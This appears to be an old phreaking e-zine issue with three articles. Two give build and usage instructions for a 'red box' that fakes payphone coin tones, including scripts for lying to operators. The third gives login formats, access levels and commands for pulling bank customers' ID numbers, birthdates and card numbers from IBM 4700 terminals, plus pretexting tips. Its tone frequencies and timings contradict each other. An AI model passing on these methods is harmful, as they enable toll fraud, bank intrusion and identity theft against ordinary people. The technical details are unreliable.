Brief Operation
~~~~~~~~~~~~~~~
When entering $0.25 into a payphone, the only way the phone company knows
that you entered money is by a tone, which consists of 700 Hz + 2200 Hz
(3900 Hz), being flushed into the line. For a quarter you will need 3900 Hz
for 35 ms in length, a pause for 35 ms, then 3900 Hz for 35 ms, then a
pause... etc. This must be produced exactly FIVE times, so you should have
five tones of 3900 Hz of 35 ms with pauses of 35 ms between each.

Our DTMF generator contains a ten-number memory. When we save a number into
the DTMF memory and replay it, the redial timing will play the tone for
72.3 ms and pause for 72.3 ms before going to the next tone and playing
that for 72.3 ms! Now the tones will be played at this speed ONLY with the
3.579545 MHz crystal, as the crystal controls ALL LOGIC and TONE GENERATING
TIMING! So when this is replaced with a 6.5535 MHz crystal it naturally
will be a lot faster and the timing will be faster. As a matter of fact the
timing is NOW 34.3 ms! So anything redialled by the DTMF generator will come
out at 34.3 ms with a pause of 34.3 ms. Our "*" key will also sound very
close to the 700 + 2200 Hz, and therefore saving "*" 5 times in a memory
and redialling it will result in something that sounds like a $0.25. All
one has to do is put the red box to the payphone mouth piece and the phone
system will think you entered a valid $0.25.


_____________________
/ General Description \____________________________________________________

Features
~~~~~~~~
* 2.5V-12V operation when generating tones, which is A LOT
  less voltage needed, compared to several white boxes I've
  seen which ask for 16V-24V.
* Stores and auto-dials ten 16-digit numbers.
* Last number redial.
* Scratchpad, meaning number storage without dialling.
* 14 keys, separate storage and redial buttons.
* 2-digit overwrite for PBX access codes.
* Low harmonic distortion.
* Single-contact or negative-common (2-of-8) key-pad inputs.

Well, before we begin I must say that replacing the 3.57545 MHz crystal
with a 6.5536 MHz one will give us the 3900 Hertz tone ONLY by the "*" key.
With this information the same is true for any key on the keypad! In fact
my calculations proved that in order to get an EXACT 3900 Hertz by the "*"
key we would need a crystal of about 6.4857 MHz. However, expecting a
6.4857 MHz crystal to be in production is asking for a little too much, so
naturally we settle for the closest one possible to it; besides, analog
signals are quite difficult to simulate exactly, compared to digital,
which is always exact!

This IC is from "National Semiconductor Corporation", model number TP5660.
Perhaps it is even the exact IC in the Radio-Shack Pocket Dialer with
Memory, as the one without memory uses the TP5650, which is this exact IC
but without memory! The operating temperature is -30°C to +60°C. This IC
looks like so:

                              1 ┌─────┬──┬──────┐ 16
                         Vdd ───┤     └──┘      ├─── TONE OUT
                              2 │   National    │ 15
                          Vm ───┤ Semiconductor ├─── Row 5
                              3 │    (Linear    │ 14
                       Col 1 ───┤   Databook)   ├─── Row 1
                              4 │               │ 13
                       Col 2 ───┤               ├─── Row 2
                              5 │    TP5660     │ 12
                       Col 3 ───┤               ├─── Row 3
                              6 │               │ 11
                         Vss ───┤               ├─── Row 4
                              7 │               │ 10
 ┌────────────────────OSC IN ───┤               ├─── MUTE OUT
┬┴┬  3.579545 MHz Crystal     8 │               │ 9
┴┬┴  Control OSC.   ┌OSC OUT ───┤               ├─── Col 4
 └──────────────────┘           └───────────────┘

Replace the crystal above with the arrangement below to have both red and
white boxes in one.

 ┌───┬────
┬┴┬ ┬┴┬   3.579545 MHz
┴┬┴ ┴┬┴
 └ │ ┘    If you put a two-way switch you can switch from crystal
   └────  to crystal, and you'll have a red and white (combo) box!

Your new crystal should be 6.5536 MHz for the "*" key.


Pin Description
~~~~~~~~~~~~~~~
Vdd (Pin 1): The positive supply to the device, referenced to
Vss. A power-on reset circuit ensures correct operation
following initial power-up.

Vm (Pin 2): The negative terminal of the back-up battery for on-hook
memory retention. A low-voltage detect circuit prevents
misoperation of the circuit in the event of a reduction in
the on-hook supply voltage below that required to retain
stored data.

COLUMN & ROW Scans (Pins 3, 4, 5, 9, 11, 12, 13, 14, 15): When no key is
closed, pull-up resistors are active on COLUMN inputs and
pull-down resistors are active on ROW inputs. Therefore
after a key is pressed the ROW pull-down resistors cause a
negative-true on COLUMN inputs (for standard telephone
key-pads, negative-common).

Vss (pin 6): The negative supply to the device in the off-hook
state.

OSC IN, OSC OUT (pin 7, 8): All logic and tone generator timing is
derived from the on-chip oscillator circuit.

MUTE OUT (pin 10) This is a CMOS output which sinks current to
Vss when no tones are being generated and sources current
from Vdd when tones are being generated.

TONE OUT (pin 16): This output is the open emitter of an NPN
transistor. The other pin (collector) is connected with the
Vdd.

Well, this is the exact pin description according to the abilities and
limitations of this IC. Now this Integrated Circuit (IC) was designed to
be powered by the telephone line, with a battery to keep the memory intact.
Since we are powering this circuit by battery, you can feed both Vm and Vss
from the same negative supply, the battery, of course. Now the MUTE OUT pin
is perhaps also bothering you; well, this IC was designed to drive a simple
interface circuit that mutes the receiver when any key is depressed. Again
this is NOT needed, as you will be connecting your DTMF generator to a
small speaker rather than putting it directly into the line (which is what
the IC was designed for); all that MUTE does is mute the receiver while you
are depressing keys, so that other incoming sounds do not interfere and get
misread as DTMF tones. However, you can avoid adding a speaker by
unscrewing the mouth piece and feeding the TONE-OUT and Vdd supply directly
into the conventional payphone; this may attract unwanted glances, though,
so you'll be better off with a speaker.

The next part is about the key-pad, perhaps complex if you plan to design
your own. Frankly, I found that time consuming; you can buy key-pads in
several electronics stores, such as Radio Shack, though I found mine in a
local electronics store. Then again, if you have an old phone I guess you
can take it from there. Now I must warn you there are TWO types of key-pads
that are widely used, and both will work on this circuit, but you need
to know which one you have in order to make corrections.

The key-pad found in most telephones is what we call a STANDARD KEYPAD.
This has to do with the way the switch is connected inside.

      │           Simply, when a key is depressed, it closes the
──────┬┼───Row    switch but also comes in contact with the
      │┘│         negative power supply. Thus we call this method
    ──┤ │         NEGATIVE-COMMON or/and standard key-pad.
   Vss│─┤
      Col

       │          As you can see, this method consists of the row
       ├──┐       and column coming to contact (a closing of a
       │          switch). This type of keypad we call
───────┼──■─Row   SINGLE-CONTACT key-pad.
       │
      Col

If you plan to build your own key-pad, certainly the single-contact key-pad
is the way to go; it's a lot simpler. So if you're using a standard key-pad
remember to connect the negative supply to the key-pad! All that's left now
is to connect the key-pad to the circuit, which is very easy and fast; you
just connect Col 1 to Col 1, Row 1 to Row 1, etc... You may notice that
this is a military-style key-pad, as it includes the A, B, C, D keys which
you don't find in your everyday phone key-pads. You really don't need them,
so if you don't have them don't alarm yourself, just don't connect them!
However you will need TWO extra keys, one for the STORE command and the
other for REDIAL, so either add an extra key or switch or whatever you wish
and connect it, like so.

   ┌────────────────────────────Col 1
   │     ┌──────────────────────Col 2
   │     │     ┌────────────────Col 3
   │     │     │      ┌─────────Col 4
┌──┴──┬──┴──┬──┴───┬──┴──┐
│  1  │  2  │  3   │  A  ├──────Row 1
├─────┼─────┼──────┼─────┤
│  4  │  5  │  6   │  B  ├──────Row 2
├─────┼─────┼──────┼─────┤
│  7  │  8  │  9   │  C  ├──────Row 3
├─────┼─────┼──────┼─────┤
│  *  │  0  │  #   │  D  ├──────Row 4
├─────┼─────┼──────┼─────┤
│Store│     │Redial│     ├──────Row 5
└─────┴─────┴──────┴─────┘

Ahh, congrats, your DTMF generator is now completed! If you were like
myself and added an extra switch to go from white box to red box mode,
GREAT! The only difference is that a white box needs the 3.57545 MHz
crystal and the red box needs the corresponding crystal, so simply put in a
switch and move from mode to mode. Now for the red box to work we need five
3900 hertz tones, 33 milliseconds apart and 33 milliseconds long, so you'll
need to save your key five times in memory and then simply put the box to
the mouthpiece end of the payphone and press the memory key; you have just
entered $0.25 into the payphone.

NOTE: I only have this working with the 6.5536 MHz crystal. I cannot say
that the timing interval will be exact with other crystals; chances are
that taking a crystal of 7.XXXXXX or 5.XXXXXX MHz is simply too far from
the 700 + 2200 hertz tone. Try to get the closest value to 6.50 MHz.

I didn't include the way to save the red box tone into the memory, as you
get a nice little paper when you buy the IC, but in case you don't: you
first power up the unit, press "*" (or your valid red box tone key) five
times and then press STORE and the number in which to store it. And to dial
the stored key, press REDIAL and the number in which you stored the red box
tone! Remember the NEW crystal should be installed at ALL times to generate
the RED BOX tone! If you save the tone with your 6.XXXX MHz intact and
redial it with the 3.57545 MHz it will not work!

Lastly, I recommend an "A-Cut Crystal (NTSC TV color-burst)" for both the
3.57545 and your red box crystal. Try local component stores. You should
find the crystal, or else look around, ask around; I did leave you with a
few references below where I got most of my stuff, so you can try them
out if you can't find them on your own.


REFERENCE
Addison Ltd/Ltee
8018 20th Avenue
Montreal, Canada, H1Z-3S7
tel: 1-514-376-1740

Active Electronic Components
6080 Metropolitan East
Montreal, Canada, H1S-1A9
tel: 1-514-256-7538
1-800-363-7601 (Outside Quebec)

Hamilton Avnet International Canada
2570 Sabourin St., St-Laurent
Montreal, Canada, H4S-1M2
tel: 1-514-331-6443
1-800-361-7129 (Outside Quebec)

National Semiconductor Corporation
2900 Semiconductor Drive
Santa Clara, California 95051, USA

ALSO: Try out Motorola and RCA dealers. They carry lots of
crystals that go into TV decoders/scramblers, so there's a
very good chance they should have it.

The crystals don't cost more than $1.00, keypads can be bought for $0.75,
a PC board under $1.00, and the IC goes for $2.00. The project should cost
under $5 if you can find the supplies in local stores -- if I did in lonely
Canada then you should have no trouble! If they don't have it, ask them to
order it; if they ask "why?" tell them it's for a TV component, as TVs and
related works like decoders and scramblers use NTSC TV color-burst
crystals!

NOTE: For the next InfoJournal I should have a DTMF generator for "Caller
IDs" (yep, you can send your own DTMF Caller ID tones), and how the
number/name is received. So call up your local BBS with Caller ID and make
it display 666-6666 and logon as your favourite Death-Angel character name.
Those interested in the actual project can contact myself anytime soon; of
course you must have a grasp of electronics!

Rock Steady/NuKE
===========================================================================
===========================================================================
The IBM 4700 Unix Based Systems - PART I
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

For those advanced hackers and perhaps "crazy" ones, the IBM 4700s are
a new light. These systems are generally one of the hottest systems one
can ever access. These systems are usually used in banks, and they are
quite WIDELY used in Canada and the USA. I cannot speak for other parts of
the world as I haven't been able to locate any of these huge systems yet!

In this article I will show you a quick intro on the "user-friendly"
4700s. I have also obtained REAL sample captures in order to document
this article better. This article is only being released on the
"free informational" consideration, and is solely for informational
purposes. Any attempt to carry this to a further degree can lead to
serious penalization by the law.

Anyhow, let's begin. Ever wonder what type of systems banks must use when
you sit inside for a darn withdrawal or deposit of your money? The banks
do contain somewhat disturbing information about yourself and do also sell
this information to others for great deals of money. Credit bureaus are
perhaps the best organizations to work with the bankers to provide
almost all the credibility a person may hold. One can easily notice if a
bank uses the nominal IBM 4700s by a fast look around inside the bank. Go
in for a transaction and look over the cashier and see if you spot any
terminals. These terminals are simply just a monitor and a keyboard, and
the name "IBM" is usually plastered all over the monitor, so you can at
least know it's an IBM network. Many models have been introduced, each
with an added feature as the model number increases. Today the IBM 4700s
are largely used. All the systems in all the branches of the same bank are
hooked into one vast system located perhaps in the central bank head
offices, and each individual branch will be hooked into this system during
the work hours. I don't know what system these 4700s hook up to; their
speed seems like a very old VAX system, however I do not know so I cannot
say exactly. My experience is only with the station terminals (IBM 4700s).

The IBM 4700s nominally USED 1200/NONE baud modems. This is perhaps due
to the fact that this system originated in the 1979-80 period. However,
today many of these IBM 4700s are adding a 9600 baud modem. Starting in
1988 IBM developed a 9600 baud modem for these IBM 4700 systems, as it
provides a faster access time and a new security feature. These modems
are known as IBM 9600 Modems Model 7861-015; these modems have CUT
possible break-ins by at least 90%. For the first time these modems were
equipped with the Data Encryption Standard (DES); during the 1988-89 period
IBM marketed these 9600 modems at a startling $2,000 a pop to all of the
bank systems using IBMs.

However, before the 9600 modems, it is only fair to state that the
software was equipped with DES that would encrypt/decrypt information as
it passed through the server in/out of the modem. The great improvement
was that the 9600 modems had DES built into the hardware, and it would
encrypt/decrypt at a much faster rate compared to the older 1200.
Nevertheless, expect to encounter DES encryption. DES uses a 56-bit key;
if the key can be broken you have just accessed the largest system a
person can enter, thus generating the saying "Hacker's Heaven."

You must read the "Data Encryption Standard (DES)" article published in
this InfoJournal by myself to understand that DES is POSSIBLE to break.
Compared to Lucifer, DES is a lot easier, and remote access to a bank
system is very possible. Nevertheless, local access can be gained by
accessing the terminal itself within the network. I will brief you on the
functions and the workings of this IBM 4700s system.

One can easily know if they have access to an IBM 4700s by its logon
feature, which looks like the following...

------------------------------------
IDENTICATION MODE ADMIN./MODE (4700)

CODE DE L'USAGER / USER ID :
MOT DE PASSE / PASSWORD:
------------------------------------

Okay, the "---" lines simply mean that whatever is in between is the
exact input/output this system gives you once connected. Now the user ID
must follow a certain pattern, as that's how accounts are used in this
system. The USER ID goes like so:

XXX XXXXX
│││ └────────> 5 digit number identifying the bank branch.
││└──────────> User Letter. If the bank allows five people to access
││             this system each will have a letter from A to E
││             representing user #1 as A, #2 as B etc...
│└───────────> Access level: 1=Bank Manager (can do ALL).
│                            2=Bank Director (limited, can view
│                              all but cannot make many changes,
│                              like cancel a loan).
│                            4=Even less access where you cannot
│                              view all, and are restricted in
│                              changes.
│                            6=View only what #4 can. No
│                              changing possible.
└────────────> Language use: X=English
                             T=French

An example ID would be "T6A10281" whereby 10281 is the branch bank number,
A is the first account in that bank, 6 is the level of the code and T
is the language to use (French).

Once inside the system you will receive a ":" as a prompt. No help is
given, but I did manage to find a few codes for you. Basically if one
wishes to pull out a user account we can do so with the "CLTIDT6*"
command!

CLTIDT6* -> "*" Functions as an Enter key!
││││││└──> The access level (View). A 4 would allow access to
├┘│├┘│     make changes to the info displayed!
│ ││ └───> Separator
│ │└─────> "ID" = "IDentification requested"
│ └──────> Separator
└────────> "CL" = "CLient Info"

So we can guess this will pull out the client's ID! Doing a CLTIDT6*
we will get a screen like so:

-------------------------------------------------------
:CLTIDT6*
:::::::: ENREGISTREMENT CLIENT PARTICULIER ::::::::

NO CLIENT :

NOM :
PRENOM :
N.A.S : DATE NAISSANCE:
EMPLOYEUR : TEL :
-------------------------------------------------------

Unfortunately, this was a French account, so all the captures I have are in
French. Here's a quick lesson: NOM --> name; PRENOM --> given name;
N.A.S --> Social Insurance Number (SIN); DATE NAISSANCE --> date of birth.

The rest is simple. To search for a person you must try to fill in AS
MUCH as possible to search for an account! The more INFO you've got the
better it is. Once you've entered enough data you get two screens that are
as follows. Since this is French, I added the English translation inside
the parentheses.

-------------------------------------------------------
NO CLIENT : (Client number) TRANSIT: (5-digit bank #)
NO CARTE CLIENT: (Client info number) DEPUIS : (Client since)

NOM : (Real last name)
PRENOM : (Given name) SEXE : (Sex)

ADRESSE NO: (Address #) RUE : (Street) APP.:
VILLE : (City) PROVINCE :
PAYS : (Country) CODE POSTAL :(Postal/ZIP code)
A/S : LANGUE :(Language)
TEL. :

N.A.S : (SIN) DATE NAISSANCE: (Birth) NO PERMIS COND.:
:
--------------------------------------------------------

Pressing Enter will give you the next and final screen:

--------------------------------------------------------
NO CLIENT :

ACTUEL PRECEDENT
EMPLOYEUR : (Current employer) (Last employer)
POSTE OCCUPE: (Job title)
DATE DEBUT : (Since) DEBUT:(Since) FIN:(Until)
CODE: TYPE: TYPE :
TELEPHONE :

MASTER CARD : (M/C card number)
VISA : (Visa card number)
CARTE CLIENT: (Automatic bank card number)
NO COMPTE : (Account numbers [and balance if access >= 4])
:
:
:
:
--------------------------------------------------------

Con't in Part #2

The IBM 4700s Unix Base Systems - PART II
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Everyone can now understand exactly how powerful a 4700s system really is.
But perhaps the mind-boggling truth is that this information can be easily
tapped into illegally, and such information can cause great havoc. Perhaps
the most mind-boggling feature that I found interesting is the
search/profile of a client. In this section you can search for a client in
the bank needing only VERY LITTLE information. There are six nominal ways
to search for a client's profile, and they are by:

1. The Client Number (Format: XXXXX#########)
The "X"s represent letters and the "#"s represent numbers. In order
to get the Client Number you could have written it down from the
first part! But the first part demands lots of information about a
person in order to get it. With this all you need is the person's
last name, first letter of the given name and date of birth.

Eg: John Smith -- Date of Birth 75-04-21
Client Number = SMITJ249578001
The way we got the number part is like so: take the date of birth
and subtract it from 99-99-99. So 75-04-21 = (9-7)(9-5) - (9-0)(9-4) -
(9-2)(9-1). The last three digits are just in case there are
people with the same name and date of birth, kind of rare; 001
is usually ok, but try 002 if another guy exists.

2. Client Enterprise Number (Business Client Number)
Same as above but for companies.

3. Valid Account Number

4. Valid Account Number of a Term-Deposits

5. Automatic Teller Cards

6. Credit Card (M/C or VISA)

One boggling fact is this one: when you go to an Automatic Teller Machine,
check the garbage. You will see that some people throw away their
slips once they read the balance of the account. One DRAWBACK is that on
the slip you will see your Automatic Teller Card Number written on top!
This is particularly true for Canada's largest banks like Royal Bank,
National Bank and TD Bank that nominally use IBM 4700s! All one must do
is take your slip, and ALL they need on you can be found in the 4700s
systems, and slowly you find yourself in financial trouble. Sometimes "free
information" such as these articles is written for your protection. The
world is truly ruled by little bits of 1s and 0s, and turning on the right
bits can give you access to virtually anything. The code to access this
search/profile is the "CLTPR6*" command, which will give you:

-------------------------------------------------------
:CLTPR6*

1. NO DE CLIENT PARTICULIER : (Client #)
2. NO DE CLIENT ENTREPRISE : (Client # comp.)
3. NO COMPTE BANCAIRE : (Bank account #)
4. NO COMPTE PLACEMENT : (Term-Lock account)
5. NO COMPTE CARTE CLIENT : XXXXXX- (Teller card number)
6. NO COMPTE MASTERCARD : XXXX- (M/C card number)

--------------------------------------------------------

The "X"s are for SET numbers; depending on what bank system you enter, the
M/C and teller card always begin with the same first few digits. For
Manhattan Bank M/C begins with 5424... Of course if you enter a Royal Bank
the terminal will read VISA card number rather than M/C, as Royal offers
the VISA card. A search with this will get the two screens from the last
part. There are also ways to find out loan information, or how many term
deposits one has at whatever interest rate. With the right access codes
like a T2 or a T1 you can access or void any of these accounts.

HOWEVER: as easy as this sounds, it is quite difficult, then again not
difficult enough! Even if you wish to close your account in any bank your
Information does NOT become erased, as I demonstrated this to Pure Energy
who closed his accounts several years ago, though the information I got
was quite old, as his address was invalid. Nevertheless I did get his date
of birth, SIN and other information that can be used to access other
systems in other banks to gain faster access to his accounts.

Again this seems quite easy, I warn you not to try it, it will get you
penalized by the lawman. Anytime you try to change accounts or access
too much information the system creates a log, and alerts the
administrators.

All the access commands I was able to find out are listed below:

-Identification of a client
CLTIDT6 *
-Profile of a Client
CLTPRO6 *
-List of active and closed loans
CTTACT6 / # Client Number
-List of account numbers of a client
CLTDPT6 / # Client Number
-List of Term Deposits of a Client
DPTCDC6 / # Client Number

I hope you found this information useful for your own protection.
Remember, don't leave any slips from automatic tellers, and never say your
account number to a cashier; write it down and show it to them. A lot
can be done to ruin you financially with the info these systems contain.
And last but not least, I am not responsible for any attempts you make
to illegally access these systems. I know IBM will be GLAD to help you
by sending you information on these systems; of course you will have to
"pretend" you're part of a big corporation looking into their network!

Rock Steady/NuKE
===========================================================================
===========================================================================
A Beginner's Guide to Red Boxing
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

About six months ago I made my first red box, and let me tell you, this is
the way to go. With the ever-increasing dangers of phreaking, red boxing
provides a safe, effective alternative that is easily available to those
with little technical knowledge and allows calls anywhere in the world with
only a small investment. Before I elaborate on how to construct your red
box (unlike Rock Steady, I took the easy way out and used the now-famous
Radio-Shack conversion) and list some of the "tricks of the trade," let's
list the pros and cons of red boxing compared to other forms of phreaking.

Pros
~~~~
* UNTRACEABLE! Fuck ESS, nothing can find you with a red box! You're just
an average joe using a pay phone. Even if they do catch on, you can
just hang up and try again... Just don't abuse the same pay phone
for hundreds of dollars a month and everything's cool.

* Small, easy-to-carry unit is portable, durable, and looks like a
legitimate pocket dialer...

* Perfect line quality. No static, no loss of volume, etc. unlike PBXs,
extenders, and other commonly-abused phone systems.

* Low cost...thirty dollars gets you unlimited free calls (I estimate I've
"spent" over $500 so far). The only upkeep cost is new batteries every
few months. There's not even any cost at all for each call you make,
not even local charges, as with PBXs (if applicable in your area).

Cons
~~~~
* Simply put, it's a hassle. You have to drag yourself out to a pay phone
to use it. You have to keep pressing the button periodically to add more
"money." Such is the price for free calls, I suppose...

* Because you're using a pay phone, calls are voice-only. Not only are
acoustic couplers slow and laptop use unusual (ahem), but pay phones
make a click every minute, plus you constantly get a synthesized voice
or operator demanding more money every so often.

* Sometimes you can get a suspicious operator... Your average operator
is of limited intelligence (hell, I've even told an AT&T operator what
I'm doing, and she still didn't get it [Me: "Hi, I'd like to red box a
call to Paris." Bitch: "You'll be paying with quarters?" Me: "No, I'm
red boxing it. It's a device for committing toll fraud." Bitch: "Sorry
sir, I'm not familiar with that calling plan. Do you want to pay with
your calling card?" Sheesh!]. Then again, five out of five
randomly-sampled AT&T operators didn't know what 2600 Hz is, but that's
another story...) Still, it's a chance. I've gotten a few suspicious
operators who hassle you and return your "money" and ask you to reinsert
it, and even one who knew what I was doing ("Ok sir, none of your
quarters have registered. I'm afraid I'm going to have to report that pay
phone. You aren't using quarters, the tones are coming from a small
black box." I just denied it and she reconnected me, but I kept *that*
call short. Sorry Lone Wolf.) I've even once gotten an intelligent local
operator (gasp!) ("Okay, please insert a quarter now... I'm sorry sir,
that did not sound like the quarter tone. Do you want to try inserting a
real coin?") You can always hang up and hope you get a less intelligent
one, but it's a pain in the ass.

* At least in my area, local calls cannot be boxed directly...you have to
either go through an operator or use an Equal Access override code (see
below). Another hassle.

* To my knowledge, this only works on the North-American phone system...
Tough luck for all you foreigners :-).

* Doesn't work on COCOTs, only pay phones owned by the local telco.

Notes from Nowhere Man
~~~~~~~~~~~~~~~~~~~~~~
All of the above may not apply in your area; it all depends on how your
local telco runs things. Specifically, in some areas you *may* be able to
directly box local calls.

Certain phones don't seem to allow the tones to get through. So far,
I've only found three such phones, two at one location (a gas station).
Hopefully this is just a fluke and not some kind of trend...

Also, don't think that you can get money by using your box and asking
the operator for your money back. It won't work. You see, the actual
coins that you've deposited are returned to you, and since you've put
nothing in, you get nothing out.

I'd also like to add that contrary to what it says in some text files,
it is not necessary to deposit a nickel before making a call. Supposedly
the phone company performs a "ground test" when you make a call, so
something has to be in the coin chute for the call to go through. This may
or may not be true, but I've never deposited a coin before boxing a call
and I've never had any problems directly due to this (I've gotten a few
suspicious operators, but they've always relented after I "re-deposit" my
"quarter" which didn't seem to register. Of course, the international
operators at AT&T are much better informed...)


Building Your Red Box
~~~~~~~~~~~~~~~~~~~~~
There are only two real components for a red box, at least using the
"standard" method. The easiest part to get (but the more expensive one) is
a Radio Shack "Thirty-Three Number Memory Pocket Tone Dialer," catalog
number 43-141 (just ask the guy for "a tone dialer that can store
numbers" to play dumb). At last check these are US$24.95 each (and they're
kept behind the counter, so thieving is basically out unless you have
inside connections). Be sure to get the one with memory features; the one
with no memory is useless. The second thing you'll need is a 6.5536 MHz
crystal. These can be obtained from your local electronics store (they're
hard to find though, I know Radio Shack doesn't carry them) or from a mail
order electronics distributor. (One frequently mentioned is Fry's
Electronics in San Francisco, which sells these crystals for $0.89/each.
They can be reached at 415-770-3763. I did not get my crystal from Fry's,
so I cannot vouch for them.) In most cases the crystals cost between $.25
and $1.00 each, plus postage, if applicable. Oh yeah, you'll also need
three AAA batteries. You can just pick these up at the local convenience
store or buy them at Radio Shack when you buy the tone dialer. (Note:
There is a rumor that Radio Shack is no longer offering the tone-dialer
with memory. The stores in my area still have them in stock, but in some
places they're supposedly unavailable. Get 'em while you can.)

The only tools you'll need to make the red box are a small Phillips
screwdriver and a soldering iron (and solder). A pair of tweezers may also
be useful. You'll want to work in a well-lit place, naturally, with good
ventilation (solder gives off horrid fumes). First, unscrew the screws on
the back of the tone dialer's case (there are some in the battery
compartment, too). Carefully pry open the case; you'll need to apply more
force than you would think, but be careful not to break it or lose the
switches, which can fall out when the case is opened. Next, solder out the
3.579 MHz crystal, which looks like a small silver cylinder toward the
bottom-right of the board. Remove the crystal and save it. In its place,
solder in your 6.5536 MHz crystal, being careful not to let the two leads
touch one another, or to drip solder across the two leads. Because the new
crystal is much larger than the old one, you may have to *CAREFULLY* bend a
few other crystals to make room for it. Put the cover back on, and rescrew
the case. Finally, pop in the three AAA batteries the dialer requires.
You're now ready to program your box.

Programming Your Red Box
~~~~~~~~~~~~~~~~~~~~~~~~
Ok, you've just replaced the crystal in your pocket dialer. Now what
do you do? It's pretty easy. Switch the Store/Dial switch to "Store" and
turn the unit on. The red LED in the upper-left should go on (if it
doesn't, you screwed up; open it up and try again). Now press the "Mem"
button (left-most button on the bottom row) and then hit the star key ("*")
five (5) times. Then press Mem again and press a "Priority" button (one of
the top three buttons); I like to use P3 for this. The unit should beep,
letting you know that the number was stored. This button is now the
"quarter" key. Next, press the Mem button, press P3 (or whatever button
you used for the quarter key), Pause (the middle button on the bottom row),
P3, etc. (As an alternative to the Pause button, I have been informed that
you can use the pound key instead, making your dialing much quicker. I
wouldn't use this on a live operator, though... After experimenting with
this method, I've found that it tends to bring a live operator on the line
very often.) You want to store four "quarters" and five pauses total, a
pause between each "quarter." Then hit Mem again, then P2 (or whatever key
you want to use for the $1.00 key), and wait for the beep. Flip your unit
off, then switch the Store/Dial switch to Dial. Your red box is now ready.

Why Does This Work?
~~~~~~~~~~~~~~~~~~~
You may be asking yourself "how in the world can this work?!" Basically,
the red box works on the principle that when you put money into a pay phone
tones are generated to indicate to the CO that you've dropped in a coin;
the red box simulates these tones, allowing you to make calls for free.
When you replace the factory-installed 3.579 MHz crystal with the 6.5536
MHz one, you are altering the DTMF tones upward so that the star key now
happens to be the same pitch as a coin tone (1700 Hz + 2200 Hz). When you
store the five tones, nothing particular happens; but it so happens that
Radio Shack pocket dialers replay those stored tones at the precise rate
that a pay phone expects for a quarter (five thirty-three millisecond beeps
with a thirty-three millisecond pause between each of the bleeps). (It is
possible to simulate nickel and dime sounds, too, but the timings are
different, and would require much more work for something that's really
useless. Why use small coins when you can just use quarters?) Please note
that because of the tone shift caused by the crystal, the touch-tone keys
will no longer work right...your box is no longer a pocket dialer. For
those interested in keeping the dialing feature, try building the COMBO box
(red/white box), as detailed in text files and 2600 Magazine, Autumn 1992
issue.

For more information on red box theory, and for plans on how to build
a "true" red box (this requires much more time, effort, and skill, and
gives no benefit), check out other files on red boxes (RED.BOX, etc.).
Also refer to Rock Steady's excellent article on red boxing in this issue.

Rock Steady takes the "electronics" approach; being a novice at electronics
I elected to take the easy way and just modify the tone dialer.
(Remembering what it's like to have no idea what the fuck you're doing, I
wrote this file as explicitly as possible. Forgive me if it seems *too*
detailed for you.)

Placing Calls
~~~~~~~~~~~~~
To place a call with a red box, put the speaker on the tone dialer firmly
against the mouthpiece of the pay phone, making sure the black rubber ring
on the back of the dialer fits snugly against the mouthpiece, turn it on
(you can verify that it's on by the LED in the upper-left), and press the
priority (P) buttons as needed to generate quarter sounds. Details are
given for the three types of phone calls: intra-LATA, inter-LATA, and
international.


Intra-LATA (local)
~~~~~~~~~~~~~~~~~~
If you're in the same boat I am, you may not be able to box local calls.
If this is the case, just dial the operator and explain to her how you need
to place a call to wherever. Usually she'll just ask for your quarter, but
sometimes she'll ask why you don't do it yourself; in this case, you can
either feign ignorance ("Ah, iz zhat so? I ahm zorry, I ahm visiting from
Germany unt zhere ve have to make khalz through zee operator. Can you dial
it for me?") or feed her some story how the phone keeps swallowing your
quarters or not recognizing them or something. When she asks for the
quarter (or possibly more), give it to her...just press the "quarter" key
however many times is needed, leaving a slight pause between each one to
avoid suspicion (after all, no human can drop in a quarter per second).
"Thank you, please hold. CLICK. RING..."

The better, faster alternative, is to go through AT&T using an Equal Access
override code. Simply dial 10288+1-NPA-NXX-XXXX (basically, you're using
AT&T to place a call which would normally be placed via your local phone
company). Treat this just like an inter-LATA call (see below). Note that
this will only work with AT&T (10288), as only AT&T is equipped to place
long-distance calls from a pay phone. (As a side note, AT&T charges you
about $2.10 or so for a call which would normally cost only $0.25. Kinda'
funny... Of course, with a red box, this doesn't matter.) Unfortunately,
some pay phones block Equal Access codes; if this is the case, just go
through the local operator (after all, the local telco has exclusive rights
to intra-LATA calls).

If you can box local calls, just deposit the virtual quarters after
you dial the number, just like an inter-LATA call (see below).


Inter-LATA (long-distance)
~~~~~~~~~~~~~~~~~~~~~~~~~~
Dial up the number, then wait for the ACTS voice or AT&T operator. "Please
deposit two dollars and fifty-five cents for the first three minutes." Do
as it says...hit the "one-dollar" key twice and then the "quarter" key
three times (or whatever combination is required for your call). (When you
get really fast, you'll find it faster to just use the "quarter" key
exclusively.) "Thank you for using AT&T. You have twenty cents credit
toward overtime..." That's all there is to it. If you do get an operator,
keep cool, just keep putting in money but use the "quarter" key only, as
some operators will get suspicious when you drop in $1.00 in quarters at
perfectly regular intervals. They almost always leave you alone.

Every so-many minutes (usually three or five) a computer voice or a live
operator will ask for more money. Give it to her as outlined above.

Sometimes after you hang up an operator will call the phone back
immediately, demanding some money for overtime. You can either give it to
her (with your box, of course), or "give it to her." It's fun to chew out
the Bell bitch when she can't do a thing about it...they just have to write
off the loss. (They threaten to bill the called party sometimes, but they
can't legally do this; it's just an intimidation tactic.)


International
~~~~~~~~~~~~~
Dial 011, then the country code, then the area code, and finally the
local number; press the pound key ("#") to signal the end of the number.
Wait for the AT&T operator to come on (notice that all long-distance and
international calls that are paid for with coins [as opposed to calling
cards] are only handled by AT&T...really fair). Ask her to put your call
through (she may verify the number), and yes, you are paying with coins.
She'll say something like "Ok, your call will cost $6.50 [this is for
Melbourne, Australia], but I can only take $3.00 at a time. Please insert
the first three dollars now..." Be sure to use only the "quarter" key with
live operators, as many international operators have recently been alerted
to red boxing. They are catching on, so be careful not to arouse their
suspicion. When you "pay" three dollars (heheh) she'll say something like,
"Ok, please wait," then you'll hear the connection going through and
the "foreign" ringing. When someone answers she'll say something like
"This is United States calling, please hold for an international call."
If no one's home, you'll get your money back. Too bad none comes out...
The person is then muted out, then she asks for the rest of the money.
Give it to her. "Thank you, go ahead..." Every so-many minutes (usually
one or two) a live operator will ask for more money. Give it to her as
outlined above. (Note: regardless of what they may say, the operator tends
to hang out on the line and listen in on you. Do not tell the person how
you're calling, as I'm sure that's how they once caught on. I'd also
suggest keeping the conversation legal.)

